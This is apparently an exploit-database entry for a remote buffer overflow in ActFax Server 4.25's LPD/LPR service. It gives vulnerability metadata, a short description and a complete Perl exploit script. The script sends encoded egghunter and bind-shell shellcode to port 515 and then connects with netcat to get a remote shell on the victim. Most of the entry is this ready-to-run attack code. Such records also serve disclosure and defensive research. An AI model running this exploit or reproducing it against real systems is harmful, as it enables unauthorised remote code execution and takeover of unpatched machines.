ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit

vendor:

ActFax Server

by:

chap0

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: ActFax Server

Affected Version From: 4.25, Build 0221 (2010-02-11)

Affected Version To: 4.25, Build 0221 (2010-02-11)

Patch Exists: YES

Related CWE: N/A

CPE: actfax_setup_en.exe

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit

ActFax Server is vulnerable to a remote buffer overflow exploit. The exploit is triggered when a malicious payload is sent to the server via the LPD/LPR protocol. The payload contains an egghunter EDI encoded shellcode which is then executed on the vulnerable system. This exploit was discovered by chap0 in 2011 and affects ActFax Server version 4.25, Build 0221 (2010-02-11).

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit
# Date: Feb 15, 2011
# Author: chap0
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe
# Version: Version 4.25, Build 0221 (2010-02-11)
# Tested on: Windows XP SP3 en
# Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT
# Stay true my friends

print "\nActFax Server LPD/LPR Remote Buffer Overflow\n";
print " chap0 - www.seek-truth.net \n\n";

use IO::Socket;

print "Target Address Please: ";
chomp($target = <STDIN>);
 
my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '515', Proto => 'tcp');

print "Connecting. . .\n";

# egghunter EDI encoded
my $eggedi="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIrFOqZjyo4O1RPRrJwrShXMvNuluUBzBTJOoH2Wtpp0PtLKxzlorUYzlo2UHgKOKWA";


# ./msfpayload windows/shell_bind_tcp LPORT=4444
# alpha2 encoded aligned with edi
my $shellcode="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLyxniWpwpWpSPk9yuVQJr2DLKsb4pLKP".
"RvllKPR4TnksB18VoNWaZvFvQyotqKpnLwLSQSLuRVL5p9QZo4MS1kwKRJPQB67NkrrtPlKBb5l5Qn0NkcpQhK5kpt4BjWqXPPP".
"LKsxdXlKpX7Ps1jsjC5lg9lKdtlKS1N6uaKOvQyPllo1hOTM5QYWEhKPQel46c3M8x7KSMetpuKRpXlKshQ4GqkccVLK6lPKLK0".
"XUL7qN3lKGtlK31jpLIpDEtUt1KSkCQPY0ZpQKOypshaO2zLKTRJKNf1MQx7CWBUPwpaxt7rSebaOSdphpLPwDfUWkOXUx8npwq".
"uPWp7Yo4cdPPrH5ymPbKWpKOJupPrpbp2p70pPcppPaxxjvoyOKPYoYEmYO7VQkkpSphUReP4QqLoyxf1zFpPVsgcXkrIKVWPgK".
"O8Uccv7rHMgYydx9o9oJubsrs2wbHD4Xl7Km1KOXU67OyZgU81eRN2mU1KOJuRHpcpmU4GpOykS2wv7qGdqHvsZgbV9SfIrKMqv".
"jgW4TdWLEQUQLMstWTvpo6ePw42tpPrvqF1FG6PVrnSfV6pS2vsXqizlUoovkOHUmYkPpNRvQVIotpph7xmWwmSPKON5oKJPH5M".
"rSfu8LfmEMmmMKOiEgL363LgzMPkKkPsEWumk0G230rporJEPPSKOHUgzA";


my $payload1 = "A" . $eggedi . "\x7D" x (256-length($eggedi));
my $addy = "\x7D\x4B\x4A\x00" ;# --> pop EDI/ pop ESI/ pop EBP/ pop EBX/ pop ECX/ retn
my $payload2 = "w00tw00t" . $shellcode;

my $payloads = $payload1.$addy.$payload2;

print $sock $payloads;

 
print "DONE shell in a moment. . .\n";

$connect = "nc -vvn $target 4444";

system $connect